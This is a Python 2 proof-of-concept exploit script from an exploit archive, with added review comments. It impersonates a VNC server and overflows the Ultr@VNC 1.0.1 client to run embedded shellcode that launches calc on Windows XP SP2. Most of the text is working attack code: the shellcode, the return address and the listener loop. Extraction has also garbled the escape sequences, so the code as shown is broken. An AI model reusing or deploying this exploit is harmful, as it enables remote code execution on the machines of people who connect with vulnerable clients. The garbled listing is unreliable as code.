Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit

Date: 2006-04-11 — Author: Paul Haas
#!/usr/bin/python

#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
#POC by Paul Haas at Redspin.com
#Tested on WinXP SP 2: Launches Calc
import socket, struct

# Listener that impersonates a VNC server: it completes the RFB version
# exchange and then returns an oversized "server error" reply.  The page
# header attributes the client-side overflow to Log::ReallyPrint in the
# Ultr@VNC client, versions <= 1.0.1, so the remediation is a client newer
# than 1.0.1 and not connecting to untrusted VNC servers with old clients.
# NOTE(review): this is Python 2 (print statements), and the listing is
# garbled by extraction -- the backslashes of the `\x` escapes are gone and
# the newline-terminated literals have been split across lines -- so the
# text as shown does not parse.  It is kept byte-identical here.
HOST = ''                       # Localhost
# NOTE(review): '' binds INADDR_ANY (every local interface), not only loopback.
PORT = 5900                     # VNC Server
BOFSZ = 1024                    # Buffer Size
# BOFSZ drives the length of the error-reply body built in `buff` below.
# 12-byte RFB ProtocolVersion banner the server sends first.
HEAD = "RFB 003.006
"          # VNC Header
# Human-readable text at the start of the error reply.
MESSAGE = "Requires Ultr@VNC Authentication
"
NOP = "x90"                    # Standard x86 NOP
JMP = "xE9x1BxFCxFFxFF"    # JMP To BUFF
# Absolute address inside one specific winmm.dll build; the header notes it
# was only tested on WinXP SP2, and a different DLL load address breaks it.
ESP = "xE0x3AxB4x76"        # winmm.dll: JMP %esp
POP = "PASSWORD"                # RET 8

# win32_exec - CMD=calc Size=160 http://metasploit.com
# Opaque payload chunks; only len(SHELLCODE) matters to the framing below.
# The header says the test result was a calc.exe launch.
SHELLCODE = 
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe1"+
"x7cx05xd9x83xebxfcxe2xf4x1dx94x41xd9xe1x7cx8ex9c"+
"xddxf7x79xdcx99x7dxeax52xaex64x8ex86xc1x7dxeex90"+
"x6ax48x8exd8x0fx4dxc5x40x4dxf8xc5xadxe6xbdxcfxd4"+
"xe0xbexeex2dxdax28x21xddx94x99x8ex86xc5x7dxeexbf"+
"x6ax70x4ex52xbex60x04x32x6ax60x8exd8x0axf5x59xfd"+
"xe5xbfx34x19x85xf7x45xe9x64xbcx7dxd5x6ax3cx09x52"+
"x91x60xa8x52x89x74xeexd0x6axfcxb5xd9xe1x7cx8exb1"+
"xddx23x34x2fx81x2ax8cx21x62xbcx7ex89x89x8cx8fxdd"+
"xbex14x9dx27x6bx72x52x26x06x1fx64xb5x82x7cx05xd9"

#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
# The NOP count is derived from BOFSZ so MESSAGE+SHELLCODE+NOPs is BOFSZ-11
# bytes long.  NOTE(review): with the escapes restored, ESP+POP+JMP would be
# 4+8+5 = 17 bytes, not 11, so buff ends up 6 bytes over BOFSZ -- presumably
# intentional, TODO confirm.
buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
buff = buff+ESP+POP+JMP

#Egg = VNC Server Error Reply and Size of Reply + buff
# Two unsigned longs carrying htonl(0) and the big-endian length of buff,
# followed by the body.  'LL' has no byte-order prefix, so the header width
# follows the host's native `long` (4 bytes on Windows, 8 on LP64 Unix).
# For detection this is the wire signature: an "RFB 003.006" banner, a
# 12-byte client reply, then an error reply whose length field is ~BOFSZ.
egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff

print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
print 'POC by Paul Haas at Redspin.com'
print 'Server listening on port', PORT

#Server Loop
# Serves one client at a time; every connection gets the same exchange.
# NOTE(review): the listening socket `s` is created and bound afresh on each
# iteration and is never closed.
while(1):
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       s.bind((HOST, PORT))
       s.listen(1)

       conn, addr = s.accept()
       print 'Connection by', addr

       # Send the 12-byte banner, then read the client's 12-byte version
       # reply; `data` is never inspected, any client gets the same reply.
       conn.send(HEAD)
       data = conn.recv(12)

       # Deliver the oversized error reply and hang up.
       conn.send(egg)
       conn.close()

# milw0rm.com [2006-04-11]
